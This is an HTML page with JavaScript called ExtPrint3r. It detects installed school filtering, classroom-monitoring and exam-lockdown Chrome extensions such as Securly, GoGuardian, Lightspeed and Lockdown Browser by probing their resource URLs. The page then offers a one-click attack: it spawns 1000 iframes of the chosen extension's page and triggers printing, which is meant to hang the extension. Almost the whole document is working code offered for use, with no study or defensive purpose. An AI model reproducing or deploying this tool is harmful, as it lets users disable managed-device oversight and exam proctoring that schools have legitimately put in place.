<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ExtPrint3r</title>
    <style>
    	@import url('"https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap');
	* {
	    font-family: "Roboto";
            font-weight: 400;
	}

        body {
            background-color: #1e1f22;
            color: white;
        }

	.extension-container {
            margin-left: 12px;
            margin-bottom: 12px;
    	    display: flex;
    	    flex-direction: column-reverse;
    	    align-items: flex-start;
    	    justify-content: space-between;
    	    gap: 10px;
    	    padding: 10px;
    	    border-radius: 10px;
    	    width: 375px;
    	    height: 140px;
    	    position: relative;
    	    background: #292a2d;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
	}

	.extension-info {
    	    display: flex;
    	    align-items: center;
    	    margin: 10px;
    	    gap: 8px;
    	    justify-content: flex-end;
	}

	.extension-name {
    	    font-size: 13px;
    	    color: white;
	}

		.extension-id {
    	    font-size: 13px;
    	    color: white;
	}

	.extension-container img {
    	    width: 40px;
    	    height: 40px;
	}

	.extension-container button {
    	    background: transparent;
    	    color: #9dbae9;
    	    font-weight: bold;
    	    border: 1px solid #047db7;
    	    border-radius: 20px;
    	    width: 80px;
    	    height: 35px;
    	    padding: 7px 10px;
    	    cursor: pointer;
    	    align-self: flex-end;
    	    transition: background 0.2s ease-in-out;
	}

	.extension-container button:hover {
    	    background: #38393b;
	}

        a {
            color: #9dbae9;
        }

	h2 {
            font-weight: bold;
        }
	    
        h3 {
    	    margin-left: 35px;
    	    color: white;
    	    margin-top: 20px;
	}
    
    	#div-container {
    	    display: flex;
    	    flex-wrap: wrap;
    	    margin-left: 20px;
    	    width: 100% - 20px;
	}

	footer {
    	    width: 100%;
    	    text-align: center;
    	    margin-top: 20px;
    	    padding: 10px 0;
	}
    </style>
</head>
<body>
    <div style="display: flex; align-items: center;">
        <img src="https://raw.githubusercontent.com/Blobby-Boi/ExtPrint3r/refs/heads/main/icon.png" width="50px" height="50px" style="margin-right: 10px;">
        <h2>ExtPrint3r</h2>
    </div>
    <p>This is ExtHang3r but it uses printing which makes it much faster and last way longer...</p>
    <h3>All Extensions</h3>
    <div id="div-container"></div>
    <footer>
        <p>Made by <a href="https://github.com/Blobby-Boi/">Blobby Boi</a></p>
    </footer>
    <div id="iframe-container"></div>

    <script>
        async function checkExtensionURL(url) {
            try {
                const response = await fetch(url);
                return response.ok;
            } catch (error) {
                return false;
            }
        }

	function getExtensionId(url) {
        	const regex = /chrome-extension:\/\/([^\/]+)/;
        	const match = url.match(regex);
        	return match ? match[1] : 'Unknown ID';
    	}
	    
        async function createExtensionButtons() {
            const container = document.getElementById("div-container");
      	    const extensions = {
		"Securly (3rd ID)": "chrome-extension://ckecmkbnoanpgplccmnoikfmpcdladkc/fonts/Metropolis.css",
		"Securly (2nd ID)": "chrome-extension://joflmkccibkooplaeoinecjbmdebglab/fonts/Metropolis.css",
        	"Securly (1st ID)": "chrome-extension://iheobagjkfklnlikgihanlhcddjoihkg/fonts/Metropolis.css",
        	"GoGuardian": "chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/youtube_injection.js",
        	"LANSchool": "chrome-extension://baleiojnjpgeojohhhfbichcodgljmnj/blocked.html",
        	"Linewize": "chrome-extension://ddfbkhpmcdbciejenfcolaaiebnjcbfc/background/assets/pages/default-blocked.html",
        	"Blocksi": "chrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html",
        	"FortiGuard": "chrome-extension://igbgpehnbmhgdgjbhkkpedommgmfbeao/youtube_injection.js",
        	"Cisco Umbrella": "chrome-extension://jcdhmojfecjfmbdpchihbeilohgnbdci/blocked.html",
        	"ContentKeeper": "chrome-extension://jdogphakondfdmcanpapfahkdomaicfa/img/ckauth19x.png",
        	"CK-Authenticator G3": "chrome-extension://odoanpnonilogofggaohhkdkdgbhdljp/img/ckauth19x.png",
        	"Securly Classroom": "chrome-extension://jfbecfmiegcjddenjhlbhlikcbfmnafd/notfound.html",
        	"Hapara (2nd ID)": "chrome-extension://kbohafcopfpigkjdimdcdgenlhkmhbnc/blocked.html",
        	"Hapara (1st ID)": "chrome-extension://aceopacgaepdcelohobicpffbbejnfac/blocked.html",
        	"iboss": "chrome-extension://kmffehbidlalibfeklaefnckpidbodff/restricted.html",
        	"Lightspeed Digital Insight Agent": "chrome-extension://njdniclgegijdcdliklgieicanpmcngj/js/wasm_exec.js",
        	"Lightspeed Filter Agent": "chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/icon-128.png",
        	"Lightspeed Classroom": "chrome-extension://kkbmdgjggcdajckdlbngdjonpchpaiea/assets/icon-classroom-128.png",
        	"InterCLASS Filtering Service": "chrome-extension://jbddgjglgkkneonnineaohdhabjbgopi/pages/message-page.html",
        	"InterSafe GatewayConnection Agent": "chrome-extension://ecjoghccnjlodjlmkgmnbnkdcbnjgden/resources/options.js",
        	"LoiLo Web Filters": "chrome-extension://pabjlbjcgldndnpjnokjakbdofjgnfia/image/allow_icon/shield_green_128x128.png",
        	"Gopher Buddy": "chrome-extension://cgbbbjmgdpnifijconhamggjehlamcif/images/gopher-buddy_128x128_color.png",
        	"LanSchool Web Helper": "chrome-extension://honjcnefekfnompampcpmcdadibmjhlk/blocked.html",
        	"IMTLazarus": "chrome-extension://cgigopjakkeclhggchgnhmpmhghcbnaf/models/model.json",
        	"Impero Backdrop": "chrome-extension://jjpmjccpemllnmgiaojaocgnakpmfgjg/licenses.html",
        	"Mobile Guardian": "chrome-extension://fgmafhdohjkdhfaacgbgclmfgkgokgmb/block.html",
        	"NetSupport School Student": "chrome-extension://gcjpefhffmcgplgklffgbebganmhffje/_locales/lt/messages.json",
        	"Lightspeed Alert Agent": "chrome-extension://gcjpefhffmcgplgklffgbebganmhffje/_locales/lt/in_page.js",
        	"Lockdown Browser": "chrome-extension://fogjeanjfbiombghnmkmmophfeccjdki/manifest.json",
        	"Linewize Filter": "chrome-extension://ifinpabiejbjobcphhaomiifjibpkjlf/background/assets/pages/default-blocked.html",
        	"Borderless Classroom Student": "chrome-extension://kdpgkligilplaanoablcpjahjjeghcl/pages/blockPage.html",
		"LockDown Browser AP Classroom Edition": "chrome-extension://djpknfecbncogekjnjppojlaipeobkmo/assets/images/icon_128.png",
		"Lugus School": "chrome-extension://eoobggamkobbcpiojefejfglbfcacgca/assets/images/icon_128.png",
      	    };

      	    const icons = {
		"Securly (3rd ID)": "https://resources.finalsite.net/images/f_auto,q_auto/v1624943346/d70k12ilus/t0iwdjo2upb1hwmylkk3/securly-180x180.png",
		"Securly (2nd ID)": "https://resources.finalsite.net/images/f_auto,q_auto/v1624943346/d70k12ilus/t0iwdjo2upb1hwmylkk3/securly-180x180.png",
        	"Securly (1st ID)": "https://resources.finalsite.net/images/f_auto,q_auto/v1624943346/d70k12ilus/t0iwdjo2upb1hwmylkk3/securly-180x180.png",
        	"GoGuardian": "",
        	"LANSchool": "",
        	"Linewize": "",
        	"Blocksi": "",
        	"FortiGuard": "",
        	"Cisco Umbrella": "",
        	"ContentKeeper": "",
        	"CK-Authenticator G3": "",
        	"Securly Classroom": "",
        	"Hapara (2nd ID)": "",
        	"Hapara (1st ID)": "",
        	"iboss": "",
        	"Lightspeed Digital Insight Agent": "",
        	"Lightspeed Filter Agent": "",
        	"Lightspeed Classroom": "",
        	"InterCLASS Filtering Service": "",
        	"InterSafe GatewayConnection Agent": "",
        	"LoiLo Web Filters": "",
        	"Gopher Buddy": "",
        	"LanSchool Web Helper": "",
        	"IMTLazarus": "",
        	"Impero Backdrop": "",
        	"Mobile Guardian": "",
        	"NetSupport School Student": "",
        	"Lightspeed Alert Agent": "",
        	"Lockdown Browser": "",
        	"Linewize Filter": "",
        	"Borderless Classroom Student": "",
		"LockDown Browser AP Classroom Edition": "",
		"Lugus School": "",
      	    };
      
            let hasSupportedExtensions = false;

            for (const [name, url] of Object.entries(extensions)) {
                if (await checkExtensionURL(url)) {
                    const div = document.createElement("div");
                    div.classList.add("extension-container");

                    const img = document.createElement("img");
                    img.src = icons[name];
                    img.alt = `${name} Icon`;

                    const infoDiv = document.createElement("div");
                    infoDiv.classList.add("extension-info");

                    const nameText = document.createElement("span");
                    nameText.classList.add("extension-name");
                    nameText.textContent = name;

		    const idText = document.createElement("span");
		    const extensionId = getExtensionId(url);
		    idText.classList.add("extension-id");
                    idText.textContent = `ID: ${extensionId}`;

                    const button = document.createElement("button");
                    button.textContent = "Print3r";
                    button.onclick = () => createIframesAndPrint(url);

                    infoDiv.appendChild(img);
                    infoDiv.appendChild(nameText);
                    div.appendChild(button);
		    div.appendChild(idText);
                    div.appendChild(infoDiv);
                    container.appendChild(div);
                    hasSupportedExtensions = true;
                }
            }

            if (!hasSupportedExtensions) {
                container.innerHTML = "<p>No supported extensions installed.</p>";
            }
        }

        function createIframesAndPrint(extPage) {
            const iframeContainer = document.getElementById('iframe-container');
            iframeContainer.innerHTML = '';
            
            for (let i = 0; i < 1000; i++) {
                const iframe = document.createElement('iframe');
                iframe.src = extPage;
                iframe.width = "10";
                iframe.height = "10";
                iframe.style.border = "none";
                iframeContainer.appendChild(iframe);
            }
            
            window.print();
            
            setTimeout(() => {
                iframeContainer.innerHTML = '';
            }, 100);
        }

        createExtensionButtons();
    </script>
</body>
</html>
